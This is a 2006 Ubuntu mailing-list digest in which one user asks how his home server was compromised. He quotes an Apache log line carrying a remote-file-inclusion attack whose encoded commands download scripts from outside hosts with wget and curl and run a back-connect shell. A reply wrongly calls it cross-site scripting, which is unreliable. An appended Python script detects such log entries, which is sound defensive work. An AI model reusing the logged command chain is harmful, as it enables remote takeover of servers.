My home desktop was compromised, but how?

Scott sdamron at gmail.com
Tue Feb 28 21:50:40 UTC 2006


It is a cross site scripting thing.  Someone is bouncing off of you in
order to gain access to someone else, unless your IP address is the
start or finish one, then you have been owned.  However, you may have
PHP installed on your system but not be using it, and it needs to be updated!!

On 2/28/06, ubuntu-users-request at lists.ubuntu.com
<ubuntu-users-request at lists.ubuntu.com> wrote:
> Today's Topics:
>
>   1. Re: can't open hda1 icon on desktop (alex)
>   2. Re: Routing Problem (?? Wei-Yee Chan)
>   3. Re: can't open hda1 icon on desktop (Max Andersen)
>   4. Re: can't open hda1 icon on desktop (Loïc Martin)
>   5. My home desktop was compromised, but how? (Carthik Sharma)
>   6. Re: [Dapper] How to get mounted disk show on the desktop
>      (Guido Heumann)
>   7. Re: XFCE4 Install under Dapper (paul cooke)
>   8. gcj compile issues (Roy Britten)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Tue, 28 Feb 2006 14:31:27 -0500
> From: alex <radsky at ncia.net>
> Subject: Re: can't open hda1 icon on desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404A50F.5070509 at ncia.net>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> alex wrote:
>
> > I downloaded a NTFS file with ubuntu and it is currently in /home.
> > I'd like to put in the Windows XP in hda1.
> > There's a hda1 icon on the ubuntu desktop but its permissions are
> > currently 400 and greyed out so
> > I can't write to it.  I tried chmod 660 but it has no effect.
> >
> > How can I get that NTFS file into hda1 without doing it in Windows?
> >
> > alex
> >
> Problem solved....... Too much of a hassle doing it in ubuntu so I
> downloaded it  with Windows XP
>
> I was hoping to do all my internet work with ubuntu but apparently there
> are still some limitations. .
>
> Thanks for the responses.
> alex
>
>
>
> ------------------------------
>
> Message: 2
> Date: Wed, 01 Mar 2006 03:32:22 +0800
> From: ?? Wei-Yee Chan <survivor at brisnet.org>
> Subject: Re: Routing Problem
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404A546.7040405 at brisnet.org>
> Content-Type: text/plain; charset=UTF-8
>
> Have U tried asking Fred?  He's using Suse, so he might know.
>
> DC Parris wrote:
> > Greetings,
> >
> > My primary box, running SUSE Linux 10.0 is doubling as my router.  I can get
> > my laptop running SUSE 10.0 to connect to the Internet through this primary
> > box.  However, I have not been able to successfully connect to the Internet
> > from an Ubuntu 5.10 box on my LAN.  Running a single distro environment is
> > not feasible for my situation, but at least there are no Windows boxes.
> > Anyway, here's my basic info.
> >
> > The primary box has two NICs, one connects to Roadrunner via DHCP, and the
> > internal NIC provides DHCP service to the internal LAN.  The Ubuntu box is
> > getting its IP address from the SUSE box just fine.  It even lists the SUSE
> > box as its name server.  Yet, it doesn't see the external NIC.
> >
> > When I ping the external NIC, I get a "network unreachable" message.  When I
> > first installed Ubuntu, I had no need to share the connection, and did not
> > configure a default route.  I believe that is where the problem lies, but am
> > not sure what to do about it.  Any help is greatly appreciated.
> >
> > Regards,
> > Don
>
>
>
>
> ------------------------------
>
> Message: 3
> Date: Tue, 28 Feb 2006 20:39:56 +0100
> From: Max Andersen <max at militant.dk>
> Subject: Re: can't open hda1 icon on desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404A70C.7000608 at militant.dk>
> Content-Type: text/plain; charset="iso-8859-1"
>
> alex wrote:
> > alex wrote:
> >
> >> I downloaded a NTFS file with ubuntu and it is currently in /home.
> >> I'd like to put in the Windows XP in hda1.
> >> There's a hda1 icon on the ubuntu desktop but its permissions are
> >> currently 400 and greyed out so
> >> I can't write to it.  I tried chmod 660 but it has no effect.
> >>
> >> How can I get that NTFS file into hda1 without doing it in Windows?
> >>
> >> alex
> >>
> > Problem solved....... Too much of a hassle doing it in ubuntu so I
> > downloaded it  with Windows XP
> >
> > I was hoping to do all my internet work with ubuntu but apparently
> > there are still some limitations. .
> >
>
> The limitation is your ntfs..... and a file is not ntfs. the filesystem
> is ntfs. Big difference. But if this simple problem scared you off, it's
> a wise choice leaving ubuntu. Because larger problems than that arise
> when using open source against closed source.
>
> Sincerely
> Max
>
> ------------------------------
>
> Message: 4
> Date: Tue, 28 Feb 2006 20:54:57 +0100
> From: Loïc Martin <lomartin3 at gmail.com>
> Subject: Re: can't open hda1 icon on desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404AA91.8080002 at gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> Max Andersen wrote:
>
> > alex wrote:
> >
> >> Problem solved....... Too much of a hassle doing it in ubuntu so I
> >> downloaded it  with Windows XP
> >>
> >> I was hoping to do all my internet work with ubuntu but apparently
> >> there are still some limitations. .
> >>
> >
> > The limitation is your ntfs..... and a file is not ntfs. the
> > filesystem is ntfs. Big difference. But if this simple problem scared
> > you off, it's a wise choice leaving ubuntu. Because larger problems
> > than that arise when using open source against closed source.
> >
> > Sincerely
> > Max
>
> That's neither really nice nor true. The fact Alex prefers to use XP
> *atm* for *this task* doesn't make it any wiser to leave Ubuntu. In
> fact, he never stated he was going to do it. Keeping XP for a while just
> for the few tasks he still doesn't know how to do on Linux while
> *keeping* Ubuntu for all the tasks that are unwise to do on XP
> (especially for beginners) seems the wisest choice.
> Cheers,
>
>
>
> ------------------------------
>
> Message: 5
> Date: Tue, 28 Feb 2006 15:44:21 -0500
> From: "Carthik Sharma" <carthik at gmail.com>
> Subject: My home desktop was compromised, but how?
> To: "Ubuntu Help and User Discussions" <ubuntu-users at lists.ubuntu.com>
> Message-ID:
>        <80f75db0602281244t9cd3e22m8759ad81a2b9d967 at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
>
> Hi,
>
> I run an apache, ssh server from my home computer. I have not
> installed any php scripts whatsoever. All there are are text files,
> and the odd html file.
>
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ (like "agent.8213") directory which I cannot open, these are
> setuid-ed -- how do I open these?
>
> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
>
> That above is a valid url, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get in my computer?
>
> (The full line is :
> 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
> HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"  )
> How would I go about tracing how this incident happened?
>
> Any server/security admins here that can help me with a little
> patience? I really want to get to the root of this and find out why
> whatever happened happened.
>
> None of the passwords for the ssh accounts are dictionary words, in
> fact all are combinations of letters, numbers and sometimes special
> symbols.
>
> I have done nothing special to modify apache, or the ssh daemon, in
> fact, sshd listens on port 8888.
>
> I could paste logs here, but they would be too long. For now, I have
> stopped the apache and ssh servers.
>
> Any help will be most welcome. My security bubble just burst :(
>
> Carthik.
>
> ------------------------------
>
> Message: 6
> Date: Tue, 28 Feb 2006 22:03:47 +0100
> From: Guido Heumann <listguido at web.de>
> Subject: Re: [Dapper] How to get mounted disk show on the desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <200602282203.48044.listguido at web.de>
> Content-Type: text/plain;  charset="utf-8"
>
> On Monday, 27 February 2006 19:20, Vincent Trouilliez wrote:
> [...]
> > In my experience, it won't take effect immediately though,
> > even restarting Nautilus wasn't enough, even logging out wasn't enough,
> > I had to reboot the machine, somehow.
>
> Hi Vince,
>
> a little hint for future experiments with GNOME configuration settings:
> there's at least one more thing you can do before rebooting, if logging out
> doesn't help: restarting GDM. From the login screen, switch to the console
> with ctrl-alt-F1 and then sudo /etc/init.d/gdm restart.
>
> Just in case you didn't know. In my experience this sometimes saves me a
> desperate reboot.
>
> Greetings,
> Guido
>
>
>
>
> ------------------------------
>
> Message: 7
> Date: Tue, 28 Feb 2006 21:10:49 +0000
> From: paul cooke <paul.cooke100 at blueyonder.co.uk>
> Subject: Re: XFCE4 Install under Dapper
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <200602282110.49413.paul.cooke100 at blueyonder.co.uk>
> Content-Type: text/plain;  charset="iso-8859-1"
>
> On Monday 27 February 2006 12:40, Jani Monoses wrote:
> > > Actually, XFCE4 is a meta package that will install enough components to
> > > have a XFCE4 desktop, as mentioned though, XFCE4 is not in its prime
> > > right now.
> >
> > xfce4 is no longer recommended, use xubuntu-desktop instead. Although
> > for those wishing to use xfce4 without the rest of xubuntu apps I guess
> > the former metapackage will need to be updated to reflect the current
> > changes.
> >
>
> what are you on about?
>
> xfce4 as a metapackage is great if you don't want the rest of your ubuntu
> being messed up by installing xubuntu-desktop.
>
> For one thing, it doesn't mess up your splashscreen shown while loading.
>
> for another,  you don't get the whole shebang of the rest of xfce4 being
> installed.
>
> And another, it makes it a heck of a lot easier to upgrade or remove...
>
> I, for one, prefer far smaller meta-packages.
>
> xubuntu-desktop is what you use when you're ONLY having xfce on top of the
> core...
>
> > Jani
>
>
>
> ------------------------------
>
> Message: 8
> Date: Wed, 1 Mar 2006 10:30:14 +1300
> From: "Roy Britten" <roy.britten at gmail.com>
> Subject: gcj compile issues
> To: ubuntu-users at lists.ubuntu.com
> Message-ID: <ea7284a10602281330v7f8baeb3x at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi,
>
> I have plans to compile (under Ubuntu) Java programs to native MS Windows
> executables. I have installed mingw32, mingw32-binutils and mingw32-runtime
> as well as gcj, gcj-4.0, gcj-4.0-base, java-gcj-compat, libgcj6,
> libgcj6-awt, libgcj6-common, and libgcj-common. I'm using the sun JVM. I'm
> running Ubuntu 5.10.
>
> I can compile a windows binary using the MingW32 gcc, and a Java class file
> using gcj. I haven't found a good howto for creating a Windows binary from
> Java code under Linux. I suspect that there's some classpath issues or some
> such to be sorted. Can someone who has done this before point me to the
> solution?
>
> Thanks,
> Roy.
>
> $ uname -a
> Linux smallgreybox 2.6.12-10-686 #1 Mon Feb 13 12:18:37 UTC 2006 i686
> GNU/Linux
> $ java -version
> java version "1.5.0_06"
> Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_06-b05)
> Java HotSpot(TM) Client VM (build 1.5.0_06-b05, mixed mode, sharing)
> $ i586-mingw32msvc-gcc -o hello.exe hello.c # successfully creates windows
> binary from C code
> $ gcj -C Hello.java # successfully creates class file from Java code
> $ gcj --main=Hello -o Hello.exe Hello.java
> gcj: libgcj.spec: No such file or directory
> $ gcj -v
> Using built-in specs.
> Reading specs from libgcj.spec
> gcj: libgcj.spec: No such file or directory
>
> ------------------------------
>


--
-------------------------------
When all you have is a hammer, everything starts to look like a nail.
Registered Linux User #409723
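
An added example, not part of the original thread: one way to triage the kind of access-log entry quoted in Message 5. It flags requests where a query parameter's value is itself a remote URL, decodes the cmd= string for the record, and uses the status code to separate refused requests (404 in the posted line) from ones that need a closer look. The function names and the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Apache access-log prefix: host ident user [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
# A query parameter whose value is itself a remote URL.
REMOTE_PARAM_RE = re.compile(r'[?&]([\w\[\]]+)=((?:https?|ftp)://[^&\s]+)', re.I)
# Everything after cmd= (the posted request put it last in the query string).
CMD_RE = re.compile(r'[?&]cmd=(.*)$', re.I)

# Constructed sample lines (documentation addresses), modelled on the posted entry.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content'
    '&do_pdf=1&id=1&mosConfig_absolute_path=http://198.51.100.7/cmd.txt?'
    '&cmd=cd%20/tmp;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [26/Feb/2006:15:01:10 -0500] "GET /notes.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.12 - - [26/Feb/2006:15:03:42 -0500] "GET /index.php?'
    'mosConfig_absolute_path=http://198.51.100.7/cmd.txt? HTTP/1.1" 200 4821 "-" "-"',
]

def triage(line):
    """Return a finding dict for a request carrying a remote-URL parameter, else None."""
    m = LOG_RE.match(line)
    hit = REMOTE_PARAM_RE.search(m.group("target")) if m else None
    if not hit:
        return None
    target, status = m.group("target"), int(m.group("status"))
    cmd = CMD_RE.search(target)
    steps = unquote(cmd.group(1)).split(";") if cmd else []
    return {
        "client": m.group("host"),
        "time": m.group("time"),
        "path": target.split("?", 1)[0],
        "param": hit.group(1),
        "remote_url": hit.group(2),
        "commands": [s for s in steps if s.strip()],
        "status": status,
        # 4xx: refused or script not found; anything else needs a closer look.
        "needs_review": status < 400 or status >= 500,
    }

def scan(lines):
    return [f for f in map(triage, lines) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["client"], f["path"], f["param"], f["status"],
              "REVIEW" if f["needs_review"] else "rejected", f["commands"])
```

A legitimate parameter that carries a URL (a redirect target, for instance) is flagged too, so each finding is a prompt to check whether the named script exists on the server, not a verdict.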



